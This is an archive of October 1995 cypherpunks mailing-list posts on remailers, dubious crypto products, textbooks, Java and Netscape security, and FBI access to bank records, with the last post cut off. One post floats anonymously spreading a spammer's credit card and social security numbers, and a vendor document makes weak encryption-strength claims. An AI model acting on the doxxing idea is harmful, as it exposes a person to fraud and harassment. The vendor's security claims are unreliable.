 plutonium




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Koning               1695 <pkoning@chipcom.com>
Date: Fri, 20 Oct 95 09:02:17 PDT
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: "power one time pad"
Message-ID: <3087F1A2@mailer2>
MIME-Version: 1.0
Content-Type: text/plain



I'd be interested in reactions to the article in Network World, 10/16/95 
issue,
page 53.  It describes a supposed cryptosystem that sounds bogus, but
I can't make up my mind about how much is the system and how much is
the confusion of the author.

Among other things, it says that POTP "doesn't use an encryption algorithm;
instead it synchronizes random processes on two computers as they
communicate".  (I wonder if the author understands that that's just another
way to describe encryption algorithms...)  The other claim is that it 
eliminates
the need to manage keys.  "... there is no need for central servers where 
PGP
keys ... are kept".

This seems like a strange claim because of course PGP doesn't require
central servers, but more importantly, you can't do authentication without
at least one piece of keying data being established out of band.  That
could be a certification authority public key, but you need something
to get started.

Supposedly this thing was shown at Interop.  Did anyone see it, and does
the product make sense even if the article didn't?

(One thing that disturbes me about the product name is the use of the
phrase "one time pad".  Since the "random" processes are presumably
not random but rather pseudo-random, there is no one time pad involved
at all, but rather a plain old stream cypher of some sort, which may or
may not be secure in practice but cannot have the "secure from first
principles" property that real one time pad has.)

     paul
     (pkoning@chipcom.com)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Rollins <trollins@hns.com>
Date: Fri, 20 Oct 95 09:46:32 PDT
To: tcmay@got.net
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <199510201646.MAA00771@dcn92.hns.com>
MIME-Version: 1.0
Content-Type: text


tcmay@got.net (Timothy C. May) wrote:

>(I was out of town most of the past few days, when the debate about this
>"Modest Proposal" happened. In reading the messages in the thread, I see a
>lot of the issues mentione that we talked about several years ago--not that
>this is a sin to talk about issues more than once--and that led to the
>creation of "message pools" and groups like "alt.anonymous.messages". But
>some new ideas are emerging. And I have a new idea for a remailer, so this
>is turning out to be a fruitful topic! Too bad the topic has already died,
>apparently.)
>
>At 4:36 PM 10/18/95, Hal wrote:
>>Eli Brandt <eli@UX3.SP.CS.CMU.EDU> writes:
>>
>>>If you
>>>split the message into shadows, you avoid having anyone in this
>>>position.
>>
>>I think splitting the message would be OK, but then the question is who
>>is responsible for reassembling it?  If there were a "reassembly
>>server" which took such messages, assembled them, and forwarded them,
>>then we would be right back where we started from.  If the end user is
>>responsible for reassembly, then that is tantamount to voluntarily
>>agreeing to receive anonymous messages, and that is no problem.  The
>>complaints we get are virtually 100% from people who didn't want to
>>receive such messages, or see them posted.  And of course anonymous news
>>postings via shadows would also have the reassembly problem.
>
>Hal succinctly describes the conceptual flaws in many of these schemes to
>replace the "last remailer" with something else: it usually turns out that
>such replacements either don't work (forging headers) or merely shift the
>problem to another agent.
>
>The most practical short term approach is for any remailer operator feeling
>some heat to do what Hal does with his Caltech remailer: remail to a site
>less likely to cause problems. For example, bounce all messages through a
>Netherlands remailer. (Even if the NL remailers are ultimately shut down,
>using them accomplishes the practical purpose of removing the heat from
>one's self...of course, they might feel the same way and lob the message
>back to U.S. remailers!)
>
>(Leading to the "Dining Buck Passers Problem," where a message never gets
>delivered because all remailers are passing the buck by lobbing the message
>to other remailers...."Charlie on the MTA.")

There could be a risk based messgae market here.  That is what the Futures 
market is about speculation and hedging (buging and selling risk). What is
a risky message in one country may be acceptable in another.


>
>
>THE ROLE OF THE "MESSENGER"
>
>But I think I have a longer term solution, one that involves a change in
>thinking about the differences between the _originator_ of a message and
>the mere _messenger_.
>
>The notion is to much more explicitly separate the functions of the
>"messenger" or "deliverer" from the "originator" or "sender." Granted, this
>is already done in the sense that a piece of e-mail goes through many
>hands. For example, Hal's message that I am responding to here has this in
>the header blocks, showing some of the "couriers" or "messengers":
>
>Return-Path: owner-cypherpunks@toad.com
>Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by you.got.net
>(8.6.9/8.6.9) with ESMTP id KAA08536 for <tcmay@got.net>; Wed, 18 Oct 1995
>10:47:24 -0700
>Received: from toad.com by relay3.UU.NET with SMTP
        >id QQzlzw04926; Wed, 18 Oct 1995 13:06:48 -0400
>Received: by toad.com id AA06207; Wed, 18 Oct 95 09:38:06 PDT
>Received: from nova.unix.portal.com by toad.com id AA06198; Wed, 18 Oct 95
>09:38:02 PDT
>Received: from jobe.shell.portal.com (jobe.shell.portal.com [156.151.3.4])
>by nova.unix.portal.com (8.6.11/8.6.5) with ESMTP id JAA01733 for
><cypherpunks@toad.com>; Wed, 18 Oct 1995 09:36:59 -0700
>Received: (hfinney@localhost) by jobe.shell.portal.com (8.6.11/8.6.5) id
>JAA17879; Wed, 18 Oct 1995 09:36:58 -0700
>Date: Wed, 18 Oct 1995 09:36:58 -0700
>From: Hal <hfinney@shell.portal.com>
>
>Now, by convention, we don't treat the _intermediate_ steps in the same way
>that we treat the "From: Hal <hfinney@shell.portal.com>" step. So, why do
>many treat _remailers_ as originators?
>
>Mostly, it's education. People get a message from "remailer@kremvax.org"
>and they are trained to think this is the sender. Or, they are trained to
>think they can send a message back to this site, or to "root@kremvax.org"
>complaining abou the mail they received and expecting that something will
>be done to make it stop. But trying to educate people that a remailer is
>not the same as a sender is likely to be a long and disappointing process.
>A better approach is needed.
>
>I believe that by changing the nature of remailers and making them much
>more explicitly like messengers, couriers, and delivery services, that we
>can win the public relations battle. There may still be legal challenges,
>but at least the semantics will not be so confusing. Just as Willis Ware
>made the point to Michael Froomkin about the confusing and misleading
>semantics of "escrow," I believe the same is true of the confusing and
>misleading semantics of "remailer." Perhaps we should just change the name
>from "remailer" (or "mix") to "Message Delivery Services." Perhaps some of
>you can think of a shorter and catchier term that still makes the messenger
>role clear.
>
>
>(I hang out on the Cyberial mailing list for cyberspace law discussions, so
>I am well aware that any change such as I am suggesting must also be tested
>as a legal strategy, and that conceptual ideas may not hold water, legally.
>I won't address legal issues here, at least not now.)
>
>The idea is to make it much more explicit that a remailer is merely
>_delivering_ a message. Few people hold their local postal carrier
>responsible for delivering a letter containing "bad material," be they
>threats, hate speech, unwanted pornography, etc. Likewise, package delivery
>services are generally not held responsible. And telephone answering
>services are not treated as the authors of, say, threatening messages, when
>they pass on messages such as:
>
>"Tim, you received a call at 4:15 p.m. saying that if continue with your
>project to collect reports of NSA visits to software companies that some
>guys dressed in blue suits will try to run you down in your parking lot."
>
>In these cases, we don't kill the messenger. We don't even sanction the
>messenger. And it's more than just that we treat the messenger as being
>ignorant of the contents, as the telephone message service example shows:
>there are several examples I can think of immediately in which harmful or
>hateful speech is relayed to someone with no expectation that the relayer
>will face sanctions.
>
>This is much more than the oft-cited doctrine of "common carrier" status,
>where the government (it is claimed) grants to the phone company certain
>rights and responsibilities with the proviso that it will not hold them
>liable for the _content_ of phone calls. (I'm not sure if Federal Express
>is treated as a "common carrier," but I'm fairly certain they are not held
>liable for various evils delivered in sealed packages, with certain obvious
>exceptions involving cooperation with law enforcement.)
>
>I'm not a lawyer, but I believe the law recognizes (and has for a long
>time) that the messenger of bad or harmful news, or mail, etc., is not to
>be held liable. There are oft-debated examples involving a newspaper
>editor's responsibility not to "relay" libelous material, and so forth, but
>these are not cases of mere couriers or messengers.
>
>(Counterpoint: And yet couriers who knowingly transport drugs of course
>face sanctions. This is a case where the possession (and hence transport)
>itself is illegal. This involves scienter--awareness--of what is being
>transported, in a way that delivery of an encrypted message clearly could
>not. Or even unencrypted messages, if the messenger could make a plausible
>claim that he does not look at or screen messages. Lots of issues to
>discuss.)
>
>
>A MAIL DELIVERY SERVICE (don't we already have them? yes, but....)
>
>So, how would this work?
>
>With remailers, even more steps need to be taken to make it absolutely
>clear that the delivered message is not _from_ the last Internet site that
>shows up in the "From:" field. More than just disclaimers are needed.
>
>One approach is for a _notification-based_ system. To wit:
>
>"You have a piece of mail awaiting at our mail delivery service. The
>originator is unknown. The title of the message is "Tentacles of Medusa
>Must Die!" You may retrieve this message by replying to this notification
>with the word "Yes" anywhere in the Subject field. This message will be
>kept for 60 days and then deleted."
>
>The idea being to more carefully distinguish between mere messengers and
>the "From:" field (not that "From:" establishes origin, as we all know from
>the whole point of remailers, but most people associate "From:" with an
>actual originator, wherein lies the problem).
>
>It would also lessen complaints from people who suddenly find unwanted mail
>arriving anonymously. People would have to make at least some token effort
>to "accept delivery."
>
>Similarities to "general delivery" mail delivery are obvious, as are
>similarities to fee-based mail forwarding services and "Mailboxes Etc."
>services.
>
>(By the way, and not to digress again, but I see systems like this as the
>likely future of mail. Some scheme where a user chooses to accept or reject
>delivery--as with packages delivered which one can refuse delivery on--is
>needed to solve several problems: mailbombs, unwanted illegal material
>arriving, the sheer flood of mail, etc. And with people moving around,
>changing companies, wanting anonymity, etc., such mail service sites will
>be a natural fit. Having them add filtering services, a la MailWeir, is one
>obvious service.)
>
>This could be implemented as a new type of remailer. This could also
>integrate with paid delivery systems, a la digital postage. (I can imagine
>some people demanding to be paid some small amount to receive a
>message....this is not feasible with the current "free delivery" model, but
>a lot of things are not possible with "free delivery." But I digress.)
>
>I'll quit for now. Lots of issues.
>
>"Don't kill the messenger."
>
>
>--Tim May


I like the Mail Delerery Service idea combined with user selectable
filters.

I would also like to see the merging of different message transmission
technology using gateways.  We have gateways... Fidonet to/from internet,
email to newsgroup, and Telegram to (snail) mail.  Would it not be
beneficial to add other gateways such as email to snail mail, email
to fax, fax to email, snail mail to email, and CB to email.

Remailers are in place in the RF world.  They are called repeaters or
transponders.  They perform the function of taking a weak signal and
boost it's power so that a larger group of receivers can pick up the
signal.  Ham radio has (vhf ?) repeaters in metropolitan areas.  Satellites
use transponders allowing the signal to be sent from horizon to horizon.
(this already has potential problems.  Hughes is comming out with a
product called DirectPC. I believe it allows you would transmit over a slow
modem but receive high data rates from a satellite.  I guess if you just look
at or edit some crypto source code from your shell account, it would be exported
as far as the satellite horizon as a byproduct of being sent to your display).

Does it not make sense for some kind of listening post to be set up to
take messages sent via Satellite, Ham radio, or CB and either place them
in a newsgroup or an archive site or a mail delivery service?  Transmitting
your anonymous e-mail by CB would be kind of nice.

Some of these RF modes are highly regulated. I believe that Hams
already have packet radio but cannot encrypt data and are accountable
for all the data being sent on their transmitter.  CB seems less regulated
, perhaps because of it's limited power and range. (this would change
with an internet repeater.)

I don't know about satellite regulation, but recall some CNN broadcast out
of Bagdad with a portable transmitter during Desert Storm.  Perhaps that kind
of equipment will be cheap and available in the future.  Is public access
limited to cable?

-Tom Rollins <trollins@hns.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 20 Oct 95 12:53:12 PDT
To: cypherpunks@toad.com
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
Message-ID: <acad483845021004366c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:45 PM 10/20/95, Rev. Mark Grant wrote:
>On Thu, 19 Oct 1995, Timothy C. May wrote:
>
>> "You have a piece of mail awaiting at our mail delivery service. The
>> originator is unknown. The title of the message is "Tentacles of Medusa
>> Must Die!" You may retrieve this message by replying to this notification
>> with the word "Yes" anywhere in the Subject field. This message will be
>> kept for 60 days and then deleted."
>
>I suspect that I could easily hack this into Mixmaster in a day or two,
>but wouldn't it open you to attacks where Anonymous Fed, say, sends
>terrorist kiddy-porn through your remailer and busts your ISP during those
>60 days for possession ? I'm not sure if it would be better or worse than
>current setups from that point of view.

In the U.S. at least, the Electronic Communications Privacy Act (ECPA) says
that e-mail should not be looked at by third parties to a communication.
Yes, there are all sorts of wrinkles, such as whether an employer may look
at employee e-mail, blah blah. But I suspect the ECPA adequately protects a
mail deliverer against charges such as Mark describes.

("But under the ECPA I am not allowed to look at this e-mail, so how can I
held be liable for it?" Not even under Stratton-Oakmont is the deliverer or
holder of e-mail held liable for content or effects--the Prodigy case
involved the fact that Prodigy was moderating/censoring speech in public
forums, so, the judge averred, Prodigy could not claim it had no duty to
moderate or censor the speech of defamers. Roughly, as IANAL.)

>I might do it anyway, and set it up to only forward PGP-encrypted
>messages, but I certainly wouldn't be able to keep messages for 60 days
>with only a MB or so to spare.

Drives are cheap. I just saw a 1.2 GB for $195 (internal, PC). I suspect
that anyone sweating over having only a MB to spare shouldn't be running a
remailer.

(Not a slam against Mark, just a statement that there are certain minimal
capabilities I'd expect to see, and not having free disk space is a serious
problem.)

In any case, by the time "General Delivery Remailers" would be spreading,
disk space will be even cheaper. And a coupon- or stamp-based remailer
could of course then buy disk space as needed.

(If a 1000 MB drive costs $300 and is written off over 3 years, then the
storage cost is $0.10 per megabyte-year. For the average text message of
about 20 KB, the cost to store it a year is $0.002. The cost to store it
for 60 days is 6 times less. Even if disk drives cost more than I've
quoted, the cost is tiny, tiny, tiny. Connection costs are likely to
dominate. Large files may be a different matter--the math is easy to
do--but these are seldom the targets of remailers to unsuspecting parties.
In any case, easy to "expire" unretrieved larger files faster.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Fri, 20 Oct 95 11:34:01 PDT
To: cypherpunks@toad.com
Subject: _Digital Cash_ info...
Message-ID: <acad9de601021004d1dd@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



As John Young noted the other day, the publisher is finally shipping my
book called _Digital Cash_. If you're curious, you can see the table of
contents from my home page:

 http://access.digex.net/~pcw/pcwpage.html

You should be able to get the book at fine bookstores like Computer
Literacy or through the publisher's 800 number (1-800-3131-APP). If you
like, you can order the book directly from me at the list price of $34.95.
Shipping is free. You can either snail mail me a check or get a First
Virtual account.

Let me know if you have any questions or comments. I would like to thank
the many members of the cypherpunks mailing list who contributed to my
knowledge in the subject. Really. Thanks.

-Peter Wayner






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dana W. Albrecht" <dwa@corsair.com>
Date: Fri, 20 Oct 95 14:54:58 PDT
To: hallyn@cs.hope.edu
Subject: Re: textbooks
Message-ID: <199510202149.OAA28734@elmos.corsair.com>
MIME-Version: 1.0
Content-Type: text/plain


 

Perry writes: 
> Kenshiro writes:
> > I am planning to do take an independent study course in cryptography.  A
> > professor here is interested in doing it with me, but neither he nor any
> > other faculty members at this school is very knowledgeable about
> > cryptography (hence his interest :).  I am looking for good (technical)
> > books on cryptography which would work well as textbooks for undergraduate
> > computer science majors with scant knowledge of number theory.
> 
> The right place to start is the new edition of Bruce Schneier's book,
> Applied Cryptography, which will be coming out within a month. The old
> edition will probably do until then. There are a number of other
> books, but Bruce's is the One Stop Shopping center, and you can spend
> years dredging up the things in the bibliography.
> 
> For flavor and motivation, you might also want to read the (unabridged
> hardcover -- not paperback!) version of "The Codebreakers" by David
> Kahn. I read this book as a child and I suppose it got me interested
> in crypto for life -- the funny thing is, it appears that the same
> experience inspired Whit Diffie to go off and co invent Public Key
> Cryptography, so it is probably a history maker. However, I'll note
> that its fluffy -- all it will do is give you a solid perspective on
> how hard it is to do this stuff right and how important it is.
 
I also suggest "A Course in Number Theory and Cryptography, 2nd Edition"
by Neal Koblitz, published by Springer Verlag.

"Applied Cryptography" is certainly the book of choice, but Koblitz
is an excellent secondary reference for covering a lot of the relevant
mathematics in more depth.

In my opinion, "Applied Cryptography" was written from the perspective
of computer science, "The Codebreakers" was written from the perspective
of history, and Koblitz's book was written from the perspective of
mathematics.

They are all nicely complementary.

Dana W. Albrecht
dwa@corsair.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Fri, 20 Oct 95 12:52:21 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: PGP interface for Mac--well...
Message-ID: <v02130501acadad5205fd@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


>Has anyone seen this yet? The only upload I've seen, on info-Mac,
>unbinhexes into something called "My Preschool Demo," and that's pretty
>much what it is.
>
>http://hyperarchive.lcs.mit.edu/HyperArchive/Archive/cmp/
>                mac-pgp-control-10b1-as.hqx
>

Well I tried the next obvious place and it is actually there. Look at: 

/info-mac/app/edu/preschool-program-10-demo.hqx

 Voila, your pre-schooler is playing with MacPGP. Actually you're not quite home free yet. Right now I'm trying to use Anarchie to hunt down FaceSpan Extension v2.0.1. The specific URL given in the docs points to a rather unresponsive host.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 20 Oct 95 15:05:28 PDT
To: cypherpunks@toad.com
Subject: The Dr. Fred scandal
Message-ID: <9510202201.AA15501@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


I feel moved to make a couple of comments.

o Dr. Fred did get over the edge.  His communication style had little to
  recommend it.
o He did make some good and useful comments along with some others.
o Some people posting anonymously and otherwise took out of context
  quotes in an apparently mean-spirited way and slammed the guy.
o Dr. Fred reacted
o Others reacted
o Some people took private email from Dr. Fred and quite unethically replied
  publicly on this list without his permission.
o I see both sides as owing this list apologies.
o There are two sides to this whole thing.

Fred brought up some concerns about possible holes in software just as many
of us have.  Most the time things like this result in good discussions on
this list and concensus is reached about the holes existing or not and
the extent of the holes.  Because of Dr. Fred's presentation, he quickly
alienated people, and what little discussion there was about his theories
was lost in the noise.

We'd do better to let it drop.  In the future if someone really annoys you
in the way they present something, perhaps it would help more if you sent
them private email noting that their communication skills are working 
against them and giving them some helpful pointers about how they could have
done things differently.  That way you'll be part of the solution instead
of part of the problem.  It's easier to get your dander up and express 
your annoyance publicly, but that affects all the rest of us.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 20 Oct 95 12:19:49 PDT
To: chip@communities.com (Chip Morningstar)
Subject: Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510190047.AA14597@ communities.com>
Message-ID: <199510201919.PAA20537@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> fc@all.net (Dr. Frederick B. Cohen) writes:
> >50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> > ... (drivel elided)
> 
> This fellow seems to be systematically (if not deliberately) ignorant
> about these things.

  I'm frequently seeing this same behavior by lots of people on
this list and it's sad. There are people making claims about
HotJava/Java that are obviously bogus if you even read the white paper,
looked at the source code, or programmed a "Hello World" applet.
The Java papers are an easy read.   If you want to know about the
implementation, read the source. At least criticize specifics about
the implementation rather than speculating what they are and then
proceeding to claim to have found a security hole in the implementation.
I'm even more surprised when I see someone with a Phd acting like
this.

-Ray





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Charles Graves <llurch@networking.stanford.edu>
Date: Fri, 20 Oct 95 15:22:31 PDT
To: cypherpunks@toad.com
Subject: Automatic File Wipe Utils for Win95?
Message-ID: <199510202222.PAA21700@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Prescript: No, I am not affiliated with any government agency in any way.

-----BEGIN PGP SIGNED MESSAGE-----

A government agency is looking for something to ensure that files copied
from a Windows 95 machine do not contain any data from unused space on the
hard drive. I'm curious too.

Perhaps a command.com hack that zeroes out any bits outside the actual
file? The problem is that existing utilities do not work because Win95
disables direct disk access to preserve VFAT. A delete utility is not
sufficient, because they are also worried about temporary files created by
Win95 programs. 

- -rich
 llurch@networking.stanford.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIgf7Y3DXUbM57SdAQEThgQAnEWB7HI2yoxiFCdosQTNG/WxiBLkqTvJ
FSf3ni7ThmHSx7acp2KueevIRcrFw89JaGj1gPH68irZj8Vh8PEP1uopQJw+QWDo
A5NsTPiZnDooXN+svGNo1KH0k36+73xXh5wybXzKFgwHWz9X4RtE+lZdJ9JDf1z7
O8IT0zG6nqc=
=NSyb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 20 Oct 95 15:57:19 PDT
Subject: Voicemail Security
In-Reply-To: <46775j$2tg@news.eecs.nwu.edu>
Message-ID: <Pine.ULT.3.91.951020153438.21479D-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Please see article <46775j$2tg@news.eecs.nwu.edu> in 
news.admin.net-abuse.misc. It has also been cross-posted elsewhere.

I wonder how often Jeff checks his messages. It would be interesting, from
a purely academic perspective of course, to see if one could anonymously
drop off more information about Jeff and his clients at that number for
private distribution. For example, credit card, driver's license, and
social security numbers. I assume that Jeff is reading this group. 

How would Jeff go about protecting his voicemail box from this sort of
attack? How would *I* go about protecting *my* voicemail box from this 
kind of attack? 

-rich
 Whose list was also spammed, but only I got it because majordomo is set
 to bounce all messages from non-subscribers to the list owner. Btw, is
 this list set up this way?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim.Cannell@f21.n216.z1.fidonet.org (Jim Cannell)
Date: Sat, 21 Oct 95 02:35:43 PDT
To: cypherpunks@toad.com
Subject: FidoNet Remailer
Message-ID: <a7c_9510210301@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-----BEGIN PGP SIGNED MESSAGE-----

I have been a long time lurker on this list, as well as having a long time
interest in crypto.  Most of my activity in this area has been on FidoNet
rather than the internet.  Due to the control phreak nature of much of
FidoNet, I've spent a lot of time and effort in an attempt to just simply
route around the bastards.  I created the SecureMail system, which is a
network of FidoNet nodes that agree to route any and all traffic without
monitoring or censorship.  Within SecureMail, encrypted traffic is not
only permitted, it is encouraged.

Which brings me to the point of this message.  I have written a anonymous
remailer program for FidoNet.  It is currently running on my FidoNet node
in an alpha test mode.  It has only been running a couple of weeks, and
seems to be doing quite well.  I have just added internet addressability
to it.  What this means is that now anonymous messages can be remailed
between FidoNet and the internet.  Having still another routing path should
further decrease the traceability of these messages.

I would like to ask the cypherpunks to help me test the remailer across
the gateway.  Please send many messages through this remailer from both
the FidoNet and the internet side of the gateway.  Try to break it.  I
want a good reliable piece of software, and if it can survive attempts
by this group to break it, there will be a lot more confidence in it.

Following are instructions for using the FidoNet remailer:

- From FidoNet, send your message to Remail at 1:216/21.  From the internet,
send your message to: remail@f21.n216.z1.fidonet.org

In all cases, the first text line of the message must contain a double
colon.  The second line contains the remail command, and the third line
is blank.  The actual text to be remailes starts on line 4.


To send a message to Joe Sixpack at FidoNet address 1:102/903, enter:
::
remail-to: Joe Sixpack @ 1:102/903.


To send a message to an internet address, enter:
::
remail-to: tcmay@got.net

(Sorry, Tim -- couldn't resist using you as an example :-) 


To get a short help file, enter:
::
help


To post a message to the FidoNet SYSOP Echo, enter:
::
remail-to: SYSOP



I'll welcome discussions of this remailer on the list, or in private mail.
Bug reports and/or comments are encouraged.  I can be reached at
Jim.Cannell@f21.n216.z1.fidonet.org


BTW, I will be at the cypherpunks meeting in Anguilla next week.  Hope to
meet some of you there.



Jim - International SecureMail Host (ISMH)
PGP key 1024/B7822B3D
fingerprint =  0F F4 79 06 3B 33 99 D1  07 36 66 66 80 85 76 B3

Protect your right to privacy. Say no to GAK.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIg6pSWTIMO3gis9AQEKLQP/TVodxgTJiik3KQK1C8QgSp/O3wzdxi+P
eC2flE6qgtlmwh6X4vbBNTmj4bKAfGLgbJyvdcMAZCESYab1dxO8q1lwOAnayW8d
qoSRhL+zT0KepmV5FXyLscq+SbzgxKoX3gkWgHlhrhHbmycr3rFGLKz6ZsoR/xmb
WX16LX2JVFk=
=vBaR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 20 Oct 95 16:36:52 PDT
To: cypherpunks@toad.com
Subject: The trial of the century?
Message-ID: <Pine.SOL.3.91.951020163031.14469C-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain



Any reports on todays outing to the Bernstein case? Any gifs of courtroom 
sketches to upload?

Simon
-----
Johnny Cochran - Sears spokesman: 
    "If it doesn't fit, you can take it back and change it."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 20 Oct 95 13:40:36 PDT
To: cypherpunks@toad.com
Subject: [reformatted] how secure can privasoft be?
Message-ID: <199510202040.QAA29119@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


heres a version with eighty character lines:

============================================================================

How Secure Can PrivaSoft Be?


Introduction

PrivaSoft is a communication security product, and the user is entitled to
know how secure it is.  This document addresses the question of cryptographic 
strength of PrivaSoft.

Export license regulations

In some advanced countries, cryptographic products are categorized as 
"munitions" and their use, sale or exportation is controlled by local 
licensing regulations.  PrivaSoft has obtained an export license from the 
governments of Israel and the USA.  Licenses in other countries are obtained 
in coordination with the local distributors.  

The typical policy is to limit the allowable cryptographic strength of 
commercial products to a level that is strong enough for commercial purposes.  
The basic intention of this regulation is to protect the state from abuse of 
too strong cryptographic products by terrorists and criminals.  Some countries
do not practice such law because it is viewed as a denial of freedom of 
expression.  PrivaSoft willfully complies with these regulations as it is a 
commercial product, and it is not intended for national security applications 
with its current key length which is the maximum legally allowable for 
commercial users.

The cryptographic engine of PrivaSoft

PrivaSoft uses a pseudo-random generator that is seeded by a 9 digit number 
uniformly normalized from the user's secret key.  The engine is proprietary, 
designed according to the rules of modern cryptology to make the best use of 
the allowable key length.

Like other dependable cryptographic engines, the structure of the encryption 
software can be disclosed without compromising the security of the user.  
However, the coding and specific parameters of the mechanism are considered a 
trade secret and will be disclosed for the purpose of cryptoanalytic 
validation when necessary and under an appropriate non-disclosure non-
competition agreement.

The use of default keys

When secret keys or passwords are used by laymen, there is always a conflict 
between security and convenience:  The user tends to use fixed, easily 
memorized keys again and again, while the cryptoanalyst only waits for an 
opportunity to see many messages encrypted by the same key.  PrivaSoft, being 
a secure commercial product must live in peace with both - allow the user to 
use a repetitive, default key, and deny the cryptoanalyst the pleasure of 
having many messages encrypted by one key.  This is done by using the pseudo-
random "key extension" feature which is described in the PrivaSoft user's 
guide.

The information contents a clear message

If a cryptographic product is properly designed, then the almost only way to 
crack it is to try all possible keys.  If the process is done by a computer, 
the "cracking"" software must be taught to tell the correct key from the 
wrong keys.  This can only be done if there are some properties of the 
decrypted message that are known a - priori.  With the PrivaSoft analogue 
graphical encryption, and with the naturally noisy fax images, a significant 
portion of the page must be reconstructed, and a significant amount of 
mathematical correlation must be calculated between neighboring areas of the 
image, before the cracking software can tell whether the candidate key is 
wrong.  This makes the cracking process much slower than in alphanumeric 
encryption of the text in a natural language.  The 9 digit key, when applied 
to analogue, the graphical encryption is equivalent to a much longer key 
applied to alphanumeric encryption.  The cryptographically oriented user can 
make it very much harder by some smart pre-processing of the image prior to 
its encryption.  A simple example:  For a short message, increasing the font 
size of the text by a factor of 10 will significantly increase the time 
required for breaking the encryption.

Customized versions of PrivaSoft

PrivaSoft is unique in being a one-stop product than can serve all types of 
modern correspondence, including E-mail, fax and paper printouts.  Special 
applications that need and can obtain a license to use non-commercial 
cryptographic engines can be accommodated by special versions of PrivaSoft.  
The cryptographic engine can be customer-furnished and customer integrated, 
however - since in some areas the integration of this product with certain 
cryptographic engines may be considered "munitions", each customized version 
of the product has to be licensed separately in accordance with the laws of 
the territory where it was created and used.

==========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lyalc@mail.mpx.com.au (lyal collins)
Date: Fri, 20 Oct 95 00:11:59 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
Message-ID: <m0t6BcA-0006MAC@kyoko.mpx.com.au>
MIME-Version: 1.0
Content-Type: text/plain


>
>WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
>be secure - regardless of the user's use of their product.  Otherwise,
>the ads should read:
>
>	"Netscape can be used securely by sufficiently knowledgeable
>	users who have emasculated their postscript interpreters before
>	using them to view files of unknown origin, and who have removed
>	all other known, unknown, and/or undisclosed security holes from
>	their systems.  Otherwise, Netscape is insecure and should not be
>	trusted."
>
>-- 

cars are claimed to "safe". That only applies is driven sober, within speed
restrictions and road conditions by a (basically) trained driver.
The same analogy applies, in my view.
lyal





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 20 Oct 95 18:24:48 PDT
To: cypherpunks@toad.com
Subject: Lack of secrecy in U.S. Banks
Message-ID: <199510210107.SAA09911@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I ran across an interesting fragment of the U.S. Code.

Apparently, the Federal Government may access any banking records
whatsoever if the Director of the FBI (or the Director's designee)
certify that the information is sought for "foreign intelligence
purposes."  Further, it is illegal for anybody to disclose that the
records were turned over to the government, or even sought.  I do not
know the penalties for disclosure.

The Attorney General appears to set guidelines for the dissemination
